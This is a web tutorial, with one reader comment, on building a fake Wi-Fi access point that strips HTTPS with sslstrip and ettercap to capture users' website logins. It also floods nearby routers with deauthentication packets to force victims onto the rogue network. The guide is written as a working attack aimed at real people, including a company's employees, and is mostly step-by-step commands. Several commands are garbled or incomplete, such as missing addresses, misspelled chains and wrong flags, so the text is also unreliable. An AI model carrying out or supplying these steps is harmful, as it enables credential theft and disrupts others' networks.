Kali Linux Tutorial: Manually Creating a Fake AP to Capture Website Logins


We’ll be setting up a fake access point where we’ll be stripping the encryption of sites using HTTPS to HTTP so we can grab the inputs of the username and password fields. We’ll also be sending deauthentication packets to all other routers nearby rendering them useless and forcing the user to log into our malicious access point. This can easily be used for attacks known as”waterhole attacks” where you attack a company where the employees don’t even notice they are on an malicious AP because it automatically connected to the malicious one due to the other ones being shutdown.

Note: Yes, I do realize some sites are utilizing TLS, so we’ll not be able to capture the logins of those sites unfortunately as the encryption mechanism will not be decrypted. (if you know a way to strip the encryption, please tell me!)

Requirements and Lab:

Step 1: Get our default gateway

Open up Kali Linux terminal and You may do this by typing:

Code: [Select]

route -n

Under where it says “Gateway”, you’ll need to memorize it or write it down as we’ll need to use it when we set our IP tables up later on.

Step 2: Now let’s install DHCP3-server

Firstly, if you haven’t done so already, type:

Code: [Select]

apt-get dist-upgrade
When that is done, now let’s install DHCP server by typing:

Code: [Select]

apt-get install dhcp3-server
Now when it’s done installing, we need to configure the DHCP server by typing:

Code: [Select]

nano /etc/dhcpd.conf
Now, copy and paste the following in:

Code: [Select]

Default-lease-time 600;
Max-lease-time 7200;
Subnet netmask {
Option routers;
Option subnet-mask;
Option domain-name “freewifi”;
Option domain-name-servers;
The only thing you’ll need to understand here is the Option domain-name line, where it says “freewifi”, you may change that to whatever you want to call your fake (and malicious) access point. For this tutorial, I’ll just keep it as freewifi.
Now, just save that by typing CTRL + X and then Y then enter.

Step 3: Now let’s begin monitor mode

To begin monitor mode, type:

Code: [Select]

airmon-ng start <wireless interface>
Then to attempt to prevent any issues, type:

Code: [Select]

airmon-ng check kill

Step 4: Begin the fake access point

Now that you have monitor mode all set up, now let’s begin the fake access point:

Code: [Select]

airbase-ng -c 11 -e <fake AP name> <monitor mode>
Now you have began the fake AP, however, if you attempt to access it, you won’t be able to. Remember to not close that terminal as you need it to be online.

Step 5: Now let’s set up the IP table rules

There are a lot of commands here, so I suggest setting up a shell script, and this is how you do it, first type:

Code: [Select]

nano iptables.sh
Now assuming you have basic knowledge of networking, I assume you’ll read over this and manually configure some of it as some of it might not work for you.

Code: [Select]

ifconfig at0 netmask
ifconfig at0 mtu 1400
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables –t nat –A PREROUTNG –p udp –j DNAT –to <GATEWAY IP HERE>
iptables –append FORWARD –-in-interface at0 –j ACCEPT
iptables –table nat -append POSTROUTING –out-interface eth0 –j MASQUERADE
iptables –t nat –A PREROUTING –p tcp –destination-port 80 –j REDIRECT –to-port 10000
Then give it permissions by typing:

Code: [Select]

chmod +x iptables.sh
Then just run it by typing:

Code: [Select]


Step 6: Starting the DHCP server

To do this, simply type in:

Code: [Select]

dhcpd –cf /etc/dhcpd.conf –pf /var/run/dhcpd.pid at0
Then to start it, type:

Code: [Select]

/etc/init.d/isc-dhcp-server start

Step 7: Starting SSLSTRIP and Ettercap

I suggest you to read my previous tutorial about Ettercap: Man In The Middle Attack Using Ettercap In Kali Linux

I assume you know what both of these tools are doing, so let’s start of by starting SSLSTRIP:

Code: [Select]

sslstrip –f –p –k 10000
Leave that terminal open. Then to begin ettercap, type:

Code: [Select]

ettercap –p –u –T –q –I  at0

Step 8: Sending Deauth packets to all other routers

Firstly, begin scanning for the routers by typing:

Code: [Select]

airodump-ng <monitor mode>
Then, select your target and write down their channel number(s) and BSSID(s). Then set the channels by typing:

Code: [Select]

iwconfig <monitor mode> channel <Ch. Number>
Now, to begin the deauthentication attack, type the following command:

Code: [Select]

aireplay-ng -0 5000 -a <BSSID> <monitor mode> –ignore-negative-one
Congrats, you are done, Now just sit back and wait for the users to log in and gather their data.

Credits: queryFrequency

Recommended Web Hacking Tutorials:

Sharing is caring!

9 thoughts on “Kali Linux Tutorial: Manually Creating a Fake AP to Capture Website Logins

  1. I doubt this works since you forgot to:
    route add -net netmask gw
    And ettercap doesn't have capital I for interface syntax, it should be lower case -i

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Posts

Begin typing your search above and press enter to search. Press ESC to cancel.

Back To Top

So glad to see you sticking around!

Want to be the first one to receive the new stuff?

Enter your email address below and we'll send you the goodies straight to your inbox.

Thank You For Subscribing

This means the world to us!

Spamming is not included! Pinky promise.